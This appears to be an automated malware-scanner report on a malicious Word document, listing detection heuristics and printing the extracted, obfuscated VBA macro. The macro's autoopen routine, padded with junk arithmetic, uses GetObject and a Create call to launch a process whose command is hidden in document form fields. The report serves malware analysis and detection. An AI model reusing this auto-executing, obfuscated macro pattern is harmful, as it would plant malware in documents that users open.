MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine is present, and the macro utilizes a GetObject call, which is a common technique for executing arbitrary code. This strongly suggests the macro is designed to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.
Heuristics 7
-
ClamAV: Doc.Malware.Drsm-6901412-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Drsm-6901412-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11103 bytes |
SHA-256: f2d92057842857ff8622dc9d6fea2b19a244a206715a35e066704db913650582 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Go1CAo1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lDBAQ_"
Attribute VB_Base = "0{5CFBE7FE-3C0C-427C-BA18-7DEA88655D38}{32B2A771-FCFA-466E-A59A-3FCF6C2637D5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ooAAAD"
Sub autoopen()
On Error Resume Next
If FA_C_AcB = RADAwU Then
s_AA_oo = 245338410 - iQCBBA
iDCADwA1 = cBkA_Ao + Oct(jB4Dwk) / 702629890 * 173415240
Set oZXZZB = vDBcAwA
IUAAGUA = (75878024 + 148256650 * lAUAww + CInt(858029941) + EAAUACA / UDGQZQQA)
EUADBQ = 811256994
End If
If cABUkADG = F4CABA Then
ZxCoAkB = 32269438 - UCAA1Z
CCZwQQA = oBAoBD + Oct(iAGU_AD) / 630178915 * 884933102
Set z1AA1AoA = ZACoBQ
QBBoAUGG = (955733607 + 581752558 * fGAkAc_ + CInt(132425903) + wAADDUUB / hABUwAA)
jC1k4AAX = 843319646
End If
Set ZxQBAoAD = GetObject(lDBAQ_.DAZZA1U)
If Yw4AAo = QBBAA_A Then
AABQADD = 401129167 - iAADAGA
UQBkAD = cGoB1AA4 + Oct(jkAAw_) / 252883297 * 588297443
Set YAA_xDwA = EXG1AA
TGUAQD = (109076475 + 311048983 * QDBAAQ + CInt(339728891) + VQXAA_1 / Xo_Z_XX)
l1QDUx = 96870468
End If
If ooUcDA1 = cAAAG4A Then
Q11BAx = 943031418 - KAD1CA
qw1Zw4A = wcAAAG + Oct(cQAwBUAA) / 49813801 * 101404809
Set MQUxwQD = FGBAUDc
UA1BUAU = (231597638 + 985767395 * DAZZAD + CInt(143346346) + VA4wwA / Uk4DxUU)
iUo1cA = 564654150
End If
ZxQBAoAD.ShowWindow = IAZACUAw + 219371 - 219371 + EDcCkB
If zAkD1G = jcBDAA Then
iA11_Q_ = 155385601 - uQkQkB
tZQAxAcw = T4QACDwA + Oct(jwocwk) / 785540370 * 815622432
Set rADDQ_ = lCAwBQ
hABA1DA = (509055555 + 213488197 * dAABAAQ + CInt(70726603) + YC_kAA / VDDXU_AC)
n_BokoDA = 807704741
End If
If WA1GAA = sZkAAB Then
jDxUB4 = 511231273 - NoUCwAc
qoUABAQ = wXQUBAA + Oct(bC1B1G) / 313150315 * 487760591
Set GAAkAD = jAQkXAXB
dAAAAk_G = (138191173 + 985201051 * RDAA1QQA + CInt(115074319) + zXAUAQoA / aAA1cA)
owx1AUU = 56513609
End If
If cCDwAX = iAkDAQA Then
mDADZ41 = 517363291 - RAwBUAU
dAAw4A = EAB_BA + Oct(LwoAAAU) / 723631859 * 540851613
Set X1U_Ak = zUAG_AAw
KQA_UZ = (668964842 + 828471514 * aU4GDUAB + CInt(686443008) + QQDAAD / uoBxZDZ)
vAQAQAwA = 780961912
End If
GetObject(lDBAQ_.DA4GUU_A).Create E_kAXXUC + lDBAQ_.i4QBZQUB + j4A1ADD_ + lDBAQ_.DxAAcAA_ + YAAXA4 + lDBAQ_.LAZCCcxQ + oAZAAQ1, WAAQA_, ZxQBAoAD, MAA4cAD_
If jAAAoUxD = HAGAAZ Then
qUBoAAwU = 69231695 - n_1UoZ
nBDAGB1 = iQAAADxx + Oct(rAkAAADB) / 599226776 * 871705289
Set hAA4DAcA = EAkQkDA
UAQD1A = (690376587 + 46809016 * zGQUAAw + CInt(742788825) + ixDA1w / pAUUZA)
tAACUU = 508166534
End If
If ZXoDDA_4 = RUAxQ44A Then
uDCAGA = 327825209 - sADUAB
i_ABAAC4 = TcAGGC + Oct(TwAG_ZQ_) / 914555056 * 287366571
Set EA_UCDGA = zkx_CUZX
TUXDQc = (2544298 + 934582326 * ZGAGACQC + CInt(749826888) + AwUwxG / EcAQk4U)
zCDAABX = 326205048
End If
If iG4cZD = tAAUkDc Then
nUQXBQ = 175028555 - wAAABCA
AB14ZA = jZD_cAAD + Oct(HxkAAQ) / 959812514 * 98964883
Set bUDAUCc = IXAGUAGA
WcwoA4Ax = (116163784 + 123883849 * VcDACAA + CInt(67026043) + b1QBAAUA / tkAA1A)
iABUAQ = 780399674
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/df02ca4d72a84090bdbd1b499fa49f12.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Go1CAo1 - 1105 bytes
' Macros/VBA/lDBAQ_ - 1156 bytes
' Macros/VBA/ooAAAD - 5665 bytes
' Line #0:
' FuncDefn (Sub ooAAAD())
' Line #1:
'
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.